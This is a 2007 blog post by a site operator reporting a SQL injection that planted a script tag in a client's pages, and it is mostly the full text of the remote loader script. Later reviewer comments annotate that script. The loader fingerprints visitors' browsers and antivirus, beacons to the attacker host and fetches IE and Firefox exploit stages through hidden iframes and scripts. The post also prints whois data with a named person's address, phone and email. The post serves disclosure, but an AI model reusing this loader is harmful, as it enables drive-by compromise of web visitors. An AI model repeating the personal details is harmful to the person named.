Tuesday, August 07, 2007

Hackers Injecting Script tags into SQL data fields

Recently, on one of my clients' sites, I noticed that some hacker scum had placed a script tag on some of the site's pages by hacking into the SQL database and inserting that script tag into a data field. This means that whenever the page is loaded, the remote script is loaded along with it.

The location of the script that is referred to is:

http://ijk.cc

The whois information for ijk.cc is:

Registrant:

robert kuphal
102 Greer Drive
Brunswick, GA 31520
US
Email: phu59@aol.com

Registrar Name....: REGISTER.COM, INC.
Registrar Whois...: whois.register.com
Registrar Homepage: www.register.com
Domain Name: ijk.cc

Created on..............: Fri, Oct 27, 2006
Expires on..............: Sat, Oct 27, 2007
Record last updated on..: Sun, Dec 24, 2006

Administrative Contact:

Andrew McDonald
102 Greer Drive
Brunswick, GA 31520
US
Phone: +1.9418279024
Email: phu59@aol.com

Technical Contact:

Andrew McDonald
102 Greer Drive
Brunswick, GA 31520
US
Phone: +1.9418279024
Email: phu59@aol.com

DNS Servers:

ns82.websitewelcome.com
ns81.websitewelcome.com

The actual script found at this location is as follows:

// build: Fri Dec 29 07:37:24 2006

// Loader configuration and shared state. Every one of these is a page-level
// global read and written by the functions below.
var debug=0;        // non-zero: print_dbg()/dbg_alert() emit diagnostics
var test_mode=0;    // non-zero: the exp_*() functions return without loading anything
var cookie_name="userid1";   // cookie jl_main() uses to avoid running twice in the same browser
var cookie_value="11"; // increment it after each exploits update
var server_addr="ijk.cc";    // host that every remote script, iframe and beacon URL is built from
var av_num_errs = 0, av_num_ready = 0, av_finished = 0;  // counters/flag driven by av_err_event()/av_ready_event()
var user_agent = "";   // "ie" | "firefox" | "opera" | "unknown", set in jl_main() from GetUserAgent()
var os_version = 0;    // Windows NT major*10+minor from GetOSVersion(); 0 when no "Windows NT x.y" token matched
var ie_version = 0, ie_build = 0, wmp_build = 0, av_id = 0;  // IE/WMP component versions and the detected-antivirus index
var system_id = "none";  // fingerprint label that jl_main2() switches on to pick what to load

// Writes a diagnostic line into the document, but only when the global
// `debug` flag is set.
// NOTE(review): the string literal on the two lines after document.writeln
// is split across a line break as reproduced here, which is not valid
// JavaScript; most likely an HTML line-break tag was stripped when the blog
// rendered the listing, so this copy is not byte-exact with what was served.
function print_dbg(str)

{
if (debug) {
document.writeln(str+"
");
}
}

/**
 * Shows `str` in an alert box while the global `debug` flag is truthy.
 * Does nothing at all otherwise.
 * @param {string} str - message to display
 */
function dbg_alert(str)
{
  if (!debug) {
    return;
  }
  alert(str);
}
/**
 * Reads the value of cookie `name` from document.cookie.
 * The cookie is recognised either at the very start of the cookie string or
 * after a "; " separator; the value is run through unescape() before it is
 * returned. Misses are logged via print_dbg() in debug mode.
 * @param {string} name - cookie name to look up
 * @returns {string|null} decoded value, or null when no cookies are set or
 *   the cookie is absent
 */
function GetCookie(name) {
  var all = document.cookie;
  var key = name + "=";
  if (!all) {
    print_dbg("Cookies not set!");
    return null;
  }
  var start;
  var afterSeparator = all.indexOf("; " + key);
  if (afterSeparator !== -1) {
    start = afterSeparator + 2;
  } else if (all.indexOf(key) === 0) {
    start = 0;
  } else {
    print_dbg(key + " not found in cookie");
    return null;
  }
  var stop = document.cookie.indexOf(";", start);
  if (stop === -1) {
    stop = all.length;
  }
  return unescape(all.substring(start + key.length, stop));
}
/**
 * Stores `name=value` in document.cookie with an expiry 365 days from now.
 * The value is escape()d. The `domain` parameter is accepted for
 * compatibility but never used, so no domain attribute is written.
 * @param {string} name - cookie name
 * @param {string} value - raw value (escaped before storing)
 * @param {string} [domain] - ignored
 */
function SetCookie(name, value, domain) {
  var ONE_YEAR_MS = 365 * 24 * 60 * 60 * 1000;
  var expiry = new Date(Date.now() + ONE_YEAR_MS);
  var cookie = name + "=" + escape(value) + "; expires=" + expiry.toGMTString();
  document.cookie = cookie;
  print_dbg("Cookie [" + cookie + "] set ok");
}


/**
 * Classifies navigator.userAgent into "ie", "firefox", "opera" or "unknown".
 * "ie" requires both "MSIE" and "Windows" in the string and is refused when
 * the string also mentions Opera or Firefox (browsers that spoof MSIE).
 * @returns {string} one of "ie", "firefox", "opera", "unknown"
 */
function GetUserAgent()
{
  var ua = navigator.userAgent;
  var mentions = function (token) {
    return ua.indexOf(token) !== -1;
  };
  if (mentions("MSIE") && mentions("Windows") && !mentions("Opera") && !mentions("Firefox")) {
    return "ie";
  }
  if (mentions("Firefox")) {
    return "firefox";
  }
  if (mentions("Opera")) {
    return "opera";
  }
  return "unknown";
}



// IE only. Creates a DIV, attaches the proprietary "#default#clientCaps"
// behavior to it, and asks it for the version of component
// {89820200-ECBD-11CF-8B85-00AA005B4383}. The four comma-separated version
// fields are packed into one integer (f0*10^10 + f1*10^8 + f2*10^4 + f3) so
// that jl_main() can compare it against thresholds such as 60029002180.
// Side effects: `oClientCaps` and `build_num` are assigned without `var` and
// so become globals; GetIEVersion() and GetWMPBuild() read oClientCaps and
// therefore only work after this function has run (see the "Must do
// GetIEBuild() first!" comment in jl_main()). `ver_num` is declared but unused.
function GetIEBuild()

{

var fa, full_ver;

var ver_num;



oClientCaps = document.createElement("DIV");

oClientCaps.id = "oClientCaps";

oClientCaps.addBehavior("#default#clientCaps");

document.body.appendChild(oClientCaps);



full_ver = oClientCaps.getComponentVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}","componentid");



fa = full_ver.split(",");



// parseInt() without a radix: on the browsers this targets a leading zero
// would be read as octal.
build_num = parseInt(fa[0]) * 10000000000 + parseInt(fa[1]) * 100000000 + parseInt(fa[2]) * 10000 + parseInt(fa[3]);



return build_num;

}





// IE only. Reads the same component version as GetIEBuild() through the
// global `oClientCaps` element (so GetIEBuild() must already have run) and
// returns major*100 + minor, e.g. 600 for IE 6.0, 700 for IE 7.x.
// `fa`/`full_ver` are locals here; `ver_num` is the return value.
function GetIEVersion()

{

var fa, full_ver;

var ver_num;



full_ver = oClientCaps.getComponentVersion ("{89820200-ECBD-11CF-8B85-00AA005B4383}","componentid");



fa = full_ver.split(",");



ver_num = parseInt(fa[0]) * 100 + parseInt(fa[1]);



return ver_num;

}



// IE only. Uses the global `oClientCaps` element (created by GetIEBuild())
// to check whether component {22D6F312-B0F6-11D0-94AB-0080C74C7E95} is
// installed; the function name and the debug message identify it as Windows
// Media Player. Returns 0 when absent, otherwise the four version fields
// packed exactly like GetIEBuild() does.
// Note: `full_ver` and `build_num` are assigned without `var` here and leak
// into the global scope; only `fa` is local.
function GetWMPBuild()

{

var fa;



if (!oClientCaps.isComponentInstalled("{22D6F312-B0F6-11D0-94AB-0080C74C7E95}", "ComponentID")) {

print_dbg("WMP not installed");

return 0;

}



full_ver = oClientCaps.getComponentVersion ("{22D6F312-B0F6-11D0-94AB-0080C74C7E95}","componentid");



fa = full_ver.split(",");



build_num = parseInt(fa[0]) * 10000000000 + parseInt(fa[1]) * 100000000 + parseInt(fa[2]) * 10000 + parseInt(fa[3]);



print_dbg(fa[0]+"."+fa[1]+"."+fa[2]+"."+ fa[3]);



return build_num;



}



/**
 * Parses the "Firefox/x.y[.z[.w]]" token out of navigator.userAgent into one
 * comparable integer: major*1000000 + minor*10000 + patch*100 + build.
 * Fields beyond the fourth are ignored; a token with fewer than two fields
 * yields NaN, exactly as the original arithmetic does.
 * Returns 0 (and logs "regexp failed" in debug mode) when the token is absent.
 * The regexp is assigned to the undeclared global `re`, as in the original,
 * so that side effect is preserved.
 * @returns {number} packed version, 0 when not a Firefox user agent
 */
function GetFirefoxVersion()
{
  re = /\sFirefox\/([\d\.]+)\b/;
  var match = re.exec(navigator.userAgent);
  if (!match) {
    print_dbg("regexp failed");
    return 0;
  }
  var fields = match[1].split(".");
  var weights = [1000000, 10000, 100, 1];
  var packed = parseInt(fields[0], 10) * weights[0] + parseInt(fields[1], 10) * weights[1];
  for (var k = 2; k < fields.length && k < weights.length; k++) {
    packed += parseInt(fields[k], 10) * weights[k];
  }
  print_dbg("Firefox version: [" + packed + "]");
  return packed;
}



/**
 * Extracts the Windows NT version from navigator.userAgent as major*10+minor
 * (e.g. "Windows NT 5.1" -> 51, "Windows NT 5.0" -> 50). Only single-digit
 * major and minor numbers are matched. Returns 0 when no "Windows NT x.y"
 * token is present. The regexp is assigned to the undeclared global `re`,
 * as in the original.
 * @returns {number} packed NT version, or 0
 */
function GetOSVersion()
{
  re = /Windows\sNT\s(\d)\.(\d)/;
  var match = re.exec(navigator.userAgent);
  if (match === null) {
    return 0;
  }
  var major = parseInt(match[1], 10);
  var minor = parseInt(match[2], 10);
  return major * 10 + minor;
}



// Points the hidden SCRIPT element with id "script1" (created in jl_main())
// at `script_src`, which makes the browser fetch and run that remote file.
// Every exp_*() helper except exp_ms06_044() and exp_vml() goes through here.
// Always returns true; there is no check that the element exists.
function ExecScript(script_src)

{

var st = document.getElementById('script1');

st.src = script_src;



return true;

}



// Points the zero-size IFRAME with id "iframe1" (created in jl_main()) at
// `iframe_src`, loading that remote page invisibly inside the compromised
// page. Used by exp_vml(). Always returns true; no existence check.
function ExecIframe(iframe_src)

{



var iframe = document.getElementById('iframe1');



iframe.src = iframe_src;



return true;

}



///// EXPS

//

// Stage selected by jl_main2() for system_id "ie6_xpsp0" (the debug message
// says "for SP0"). Honours `test_mode` (returns true without loading
// anything), otherwise loads /E/isci/isci_my.js from server_addr via the
// hidden script element. The contents of that remote file are not part of
// this listing.
function exp_iscomponentinstalled()

{

print_dbg("Loading exp_iscomponentinstalled() for SP0");



if (test_mode) {

dbg_alert("Exploit not loaded: test mode");

return true;

}



ExecScript("http://" + server_addr + "/E/isci/isci_my.js");

}





// Firefox compareto

//

// Stage selected by jl_main2() for system_id "ff104" (Firefox <= 1.0.4 per
// the version check in jl_main()). Honours `test_mode`, otherwise loads
// /E/ff104/ff104.js from server_addr via the hidden script element. The
// remote file's contents are not part of this listing.
function exp_ff104()

{

print_dbg("Loading exp_ff104()");



if (test_mode) {

dbg_alert("Exploit not loaded: test mode");

return true;

}



ExecScript("http://" + server_addr + "/E/ff104/ff104.js");

}



// Firefox navigator java

//

// Stage selected by jl_main2() for system_id "ff150" (Firefox between 1.0.4
// and 1.5.0.4 inclusive per jl_main()). Honours `test_mode`, otherwise loads
// /E/ff154/ff154.js from server_addr via the hidden script element. The
// remote file's contents are not part of this listing.
function exp_ff154()

{

print_dbg("Loading exp_ff154()");



if (test_mode) {

dbg_alert("Exploit not loaded: test mode");

return true;

}



ExecScript("http://" + server_addr + "/E/ff154/ff154.js");

}



// Windows 2000, IE 5.x

//

// Stage selected by jl_main2() for system_id "ie5_2k" (IE 5.x on Windows
// 2000). Unlike the other stages it does not use the hidden elements: it
// navigates the whole document to a res:// URL inside mmcndmgr.dll whose
// fragment carries a URL-encoded script tag that points back at
// /E/ms06044/ww.js on server_addr. The function name references the
// MS06-044 bulletin; the remote ww.js is not part of this listing.
// Detection note: a res://mmcndmgr.dll/ navigation initiated from a web page
// is distinctive enough to alert on.
function exp_ms06_044()

{

print_dbg("Loading exp_ms06_044()");



if (test_mode) {

dbg_alert("Exploit not loaded: test mode");

return true;

}



var my_src = 'http://'+server_addr+'/E/ms06044/ww.js';

// var my_src = "ww.js"

var url = 'res://mmcndmgr.dll/prevsym12.htm#%29%3B%3C/style%3E%3Cscript%20language%3D%27jscript%27%20src%3D%27'+my_src+'%27%3E3C/script%3E%3C%21--//%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0';



// Redirects the top-level document; the alternative iframe approach below
// was left commented out by the author.
document.location = url;

// ExecIframe('http://'+server_addr+'/E/ms06044/ms06044.htm');

}



// Default stage for most IE system_ids in jl_main2() ("ie7", "ie6_xp",
// "ie6_unknown", "ie6_xpsp2", "ie6_xpsp1", "ie6_2k"). Honours `test_mode`,
// otherwise loads /E/vml/vml.htm from server_addr into the hidden iframe.
// The remote page is not part of this listing. Note the debug message says
// "vml_exp()" although the function is named exp_vml().
function exp_vml()

{

print_dbg("Loading vml_exp()");



if (test_mode) {

dbg_alert("Exploit not loaded: test mode");

return true;

}



ExecIframe('http://'+server_addr+'/E/vml/vml.htm');

}



/////////// End of EXPS /////////////////

///////////////////////////////////////////////////////



// Beacon: reports the infected page to server_addr before any stage runs.
// Builds a GET to /cgi-bin/jl/jloader.pl with source=<hostname of the page
// the script was injected into> and system_id, plus iebuild/wmpbuild/av_id
// when the browser was classified as IE, and fires it by assigning the URL to
// the hidden IMG with id "serv_note_link" (created in jl_main()).
// `url` is assigned without `var` and becomes a global. A missing element is
// swallowed by the try/catch.
// Detection note: outbound requests for /cgi-bin/jl/jloader.pl with these
// query keys identify a compromised page and the visitor's fingerprint.
function NotifyServerStart()

{

url = "http://"+server_addr+"/cgi-bin/jl/jloader.pl?source="+

location.hostname+"&system_id="+system_id;



if (user_agent == "ie") {

url = url+"&iebuild="+ie_build+"&wmpbuild="+wmp_build+"&av_id="+av_id;

}



print_dbg("===>>> notify: user_agent=["+user_agent+"] url=["+url+"]");

try {

var sl = document.getElementById('serv_note_link');

sl.src = url;

// serv_note_link.src = url;

} catch (e) {

print_dbg("Cannot find element id=serv_note_link");

};

}



// Antivirus fingerprint tables, both assigned as globals (no `var`).
// `progs` holds COM ProgIDs that StartCheckAV() tries to instantiate with
// new ActiveXObject(); a success sets av_id = index + 1 (1..2).
// `cids` holds CLSIDs that StartCheckAV() turns into object markup; when one
// instantiates, av_ready_event() sets av_id = progs.length + index + 1
// (3..17). The numbers in the trailing comments are those av_id values.
progs=['NAVCfgWizDll.NAVCfgWizMgr', // 1 NAV

'McGDMgr.DwnldGroupMgr']; // 2 McAfee



cids=['48F45200-91E6-11CE-8A4F-0080C81A28D4', // 3 trendmicro

'091EB208-39DD-417D-A5DD-7E2C2D8FB9CB', // 4 Windows Defender

'D653647D-D607-4DF6-A5B8-48D2BA195F7B', // 5 BitDefender Antivirus

'9F97547E-4609-42C5-AE0C-81C61FFAEBC3', // 6 AVG7

'65756541-C65C-11CD-0000-4B656E696100', // 7 Panda Antivirus

'1474F601-9B4B-4EB0-81FA-20F753C0E1A4', // 8 F-Prot

'D5507020-DB45-11d1-A5F0-00600872F78D', // 9 Norman Virus Control

'DD230880-495A-11D1-B064-008048EC2FC5', // 10 Kaspersky

'B089FE88-FB52-11D3-BDF1-0050DA34150D', // 11 Nod32

'472083B0-C522-11CF-8763-00608CC02F24', // 12 Avast

'45AC2688-0253-4ED8-97DE-B5370FA7D48A', // 13 Antivir

'8934FCEF-F5B8-468F-951F-78A921CD3920', // 14 Ewido

'1EB2409C-6E28-4066-9738-97A1B8F5639C', // 15 ??

'E7593602-124B-47C9-9F73-A69308EDC973', // 16 Dr Web

'B43CB0C0-84F2-11D6-A18E-00C0DF043BA4']; // 17 VBA32







// Callback for CLSID slot `i` failing to instantiate: bumps the global error
// counter and clears cids[i] so av_ready_event() ignores that slot.
// NOTE(review): presumably wired to the objects' error handler in the markup
// StartCheckAV() builds, but that markup is missing from this listing.
function av_err_event(i) {

av_num_errs++;

cids[i] = null;

}



// Callback for CLSID slot `i` becoming ready. If nothing has been found yet
// (av_finished is 0) and the slot was not cleared by av_err_event(), records
// the antivirus as av_id = progs.length + i + 1 and sets av_finished.
// `str` is declared twice and never used; the jl_main2() call that would
// have continued the flow from here is commented out, so this only records
// state for NotifyServerStart() to report.
function av_ready_event(i) {

var str = "ready: "+cids[i];

av_num_ready++;



if (av_finished) {

return;

}

if (cids[i] != null) {

var str = "av_redy_event(): Antivirus found: "+cids[i]+"!";



av_id = progs.length + i + 1;



av_finished = 1;



dbg_alert("av_redy_event(): Antivirus found: "+cids[i]+"!");



// jl_main2();

}

}



// Return:

// 1 - antivirus found

// 0 - operation in progress

//

// Two-phase antivirus detection, IE only (called from jl_main()'s IE branch;
// its return value is ignored there).
// Phase 1: try new ActiveXObject() on each ProgID in `progs`; the first that
// succeeds sets av_id = index + 1 and av_finished, and the function returns 1.
// Phase 2: build object markup for every CLSID in `cids` and assign it to the
// innerHTML of a detached DIV; results arrive asynchronously through
// av_err_event()/av_ready_event(), so the function normally returns 0 here.
// NOTE(review): the line `txt += '<'+'/object>'` as reproduced only emits a
// closing tag; the opening object tag carrying the CLSID and event handlers
// was almost certainly stripped by the blog's HTML rendering, so this copy
// of phase 2 is incomplete.
// All exceptions in both phases are swallowed. `i` is assigned without `var`
// and becomes a global; `num_errs` is unused.
function StartCheckAV()

{

var txt = "";



try {

var num_errs = 0;



print_dbg("Start check progs...");



for (i = 0; i < progs.length && !av_id; i++) {

try {

print_dbg("Checking "+progs[i]+"...");

new ActiveXObject(progs[i]);

print_dbg("Antivirus installed: " + progs[i]);

av_id = i + 1;

av_finished = 1;

}

catch (e) {};

}

if (av_id) {

print_dbg("Antivirus detected av_id="+av_id+" (progs)!");

return 1;

}



print_dbg("Start check antivirus CLSIDs");



for (i = 0; i < cids.length; i++) {

print_dbg("Creating "+cids[i]+"...");

txt += '<'+'/object>';

}



document.createElement('div').innerHTML = txt;

} catch (e) {};



if (av_id) {

print_dbg("Antivirus detected av_id="+av_id+"(cids, before callbacks)!");

return 1;

}



return 0;

}



// Entry point, registered on DOMContentLoaded at the bottom of the file.
// Runs once per browser (cookie gate), fingerprints OS and browser, appends
// the hidden IMG/IFRAME/SCRIPT elements the other functions use, derives a
// system_id label from the fingerprint and hands off to jl_main2().
// Detection note: the three helper elements get fixed ids ("serv_note_link",
// "iframe1", "script1") and zero size.
function jl_main()

{

// dbg_alert("jl_main() started!");



// Cookie gate: if cookie_name already holds cookie_value this browser was
// processed by this version of the loader, so stop. Skipped in debug mode;
// any cookie error is swallowed and the loader proceeds anyway.
if (!debug) {

try {

if (GetCookie(cookie_name) == cookie_value) {

print_dbg("Est kuka!");

return false;

}

SetCookie(cookie_name, cookie_value);

} catch (e) {};

}



// Get OS and browser versions

//

os_version = GetOSVersion();

user_agent = GetUserAgent();



// document.writeln("[Photo]");





// Zero-size IMG used by NotifyServerStart() as the beacon carrier.
var tmp_img = document.createElement("IMG");

tmp_img.id = "serv_note_link";

tmp_img.width = 0;

tmp_img.height = 0;

tmp_img.border = 0;

tmp_img.frameborder = 0;

tmp_img.src = "about:blank";

document.body.appendChild(tmp_img);





// Zero-size IFRAME used by ExecIframe().
var iframe1 = document.createElement("IFRAME");

iframe1.id = "iframe1";

iframe1.border = 0;

iframe1.frameborder = 0;

iframe1.width = 0;

iframe1.height = 0;

document.body.appendChild(iframe1);





// document.writeln("");





// Empty SCRIPT element whose src ExecScript() swaps later.
var script1 = document.createElement("SCRIPT");

script1.id = "script1";

document.body.appendChild(script1);



// document.writeln("");



print_dbg("OS Version: NT " + os_version);

print_dbg("Browser: " + user_agent);



// Internet Explorer

//

if (user_agent == "ie") {



// Must do GetIEBuild() first!

//

ie_build = GetIEBuild();

ie_version = GetIEVersion();

wmp_build = GetWMPBuild();



print_dbg("IE version: [" + ie_version + "]");

print_dbg("IE build: [" + ie_build + "]");

print_dbg("WMP build: [" + wmp_build + "]");



// IE 7.x

//

// system_id selection: IE 7 is labelled regardless of OS; IE 6 is split by
// os_version (50 = 2000, 51 = XP) and, on XP, by ie_build thresholds that
// stand for the service-pack builds; IE 5 is split by os_version only. An
// IE 5 on os_version > 50 leaves system_id at "none".
if (ie_version >= 700) {

system_id = "ie7";

} else if (ie_version >= 600) {

// IE 6.x

//

print_dbg("IE " + ie_version + " ");

if (os_version == 50) {

// Windows 2000

//

print_dbg("Win 2000 IE6");

system_id = "ie6_2k";



} else if (os_version == 51) {

// Windows XP

//

if (ie_build >= 60029002180) {

print_dbg("Win XP SP2");

system_id = "ie6_xpsp2";

} else if (ie_build >= 60028001106) {

print_dbg("Win XP SP1");

system_id = "ie6_xpsp1";

} else if (ie_build == 60026000000) {

print_dbg("Win XP SP0");

system_id = "ie6_xpsp0";

} else {

system_id = "ie6_xp";

print_dbg("Win XP SP unknown: " + ie_build);

}

} else {

// TODO: Support for 98, NT, Win2003, Vista

//

print_dbg("Win unsupported " + os_version);

system_id = "ie6_unknown";

}

} else if (ie_version < 600) {

// IE 5.x

//

print_dbg("IE " + ie_version + " ");

if (os_version == 50) {

// MSIE 5, Windows 2000

//

print_dbg("Win 2000");

system_id = "ie5_2k";



} else if (os_version < 50) {

print_dbg("Win NT " + os_version);

system_id = "ie5_nt";

}

}



// Antivirus fingerprinting; the 0/1 result is discarded and av_id is only
// reported by NotifyServerStart(), it does not gate the dispatch below.
StartCheckAV();

}



// Mozilla Firefox

//

// Only classified when a Windows NT version was matched (os_version != 0).
if (user_agent == "firefox" && os_version != 0) {

var firefox_version = 0;



firefox_version = GetFirefoxVersion();



// Version <= 1.0.4

if (firefox_version <= 1000400) {

system_id = "ff104";

}



// 1.0.4 < Version < 1.5.0.4

// (the code actually includes 1.5.0.4 itself: the test is <= 1050004)
if (firefox_version > 1000400 && firefox_version <= 1050004) {

system_id = "ff150";

}

}



jl_main2();

}



/**
 * Replaces the browser status-bar text with `stat_str`.
 * jl_main2() uses it to show an "Opening ..." message and later "Done".
 * @param {string} stat_str - text to display in window.status
 */
function set_window_status(stat_str)
{
  var target = window;
  target.status = stat_str;
}



// Dispatch stage, called at the end of jl_main(). Marks AV detection as
// finished, sends the beacon (NotifyServerStart()), writes a plausible
// "Opening <page>..." status-bar message that is replaced by "Done" after
// 5 s, then picks one exp_*() function purely from system_id. Note that
// av_id plays no part in the choice; "ie5_nt" and unknown labels load
// nothing. The setTimeout() call passes a string, which is evaluated as code.
function jl_main2()

{

av_finished = 1;



// print_dbg("av_on="+av_on);



NotifyServerStart();



set_window_status("Opening "+window.location.href+"...");

setTimeout("set_window_status('Done')", 5000);

print_dbg("system_id: "+system_id+" av_id="+av_id+" user_agent="+user_agent);



switch (system_id) {

case "ie7":

case "ie6_xp":

case "ie6_unknown":

case "ie6_xpsp2":

exp_vml();

break;

case "ie6_xpsp1":

exp_vml();

break;

case "ie6_xpsp0":

exp_iscomponentinstalled();

break;

case "ie6_2k":

exp_vml();

break;

case "ie5_2k":

exp_ms06_044();

break;

case "ie5_nt":

break;

case "ff104":

exp_ff104();

break;

case "ff150":

exp_ff154();

break;

default:

break;

}



// setTimeout('NotifyServerFinish()', 2000);

}





//jl_main();





// Run main function only after dom loaded

/* for Mozilla */

// Bootstrap. Browsers with addEventListener (Mozilla) run jl_main() once the
// DOM is ready. The other branch is for IE and, as reproduced here, only
// writes a closing script tag.
// NOTE(review): the opening tag that would trigger jl_main() in IE appears
// to have been stripped by the blog's rendering, so the IE start-up path is
// not recoverable from this listing.
if (document.addEventListener) {

document.addEventListener("DOMContentLoaded", jl_main, false);

} else {

// IE

document.write("<"+"/script>");

}

I will be giving Mr Robert Kuphal of Brunswick, Georgia, USA a call to ask him why a link to a script hosted on his domain has been illegally inserted into the SQL database of the site.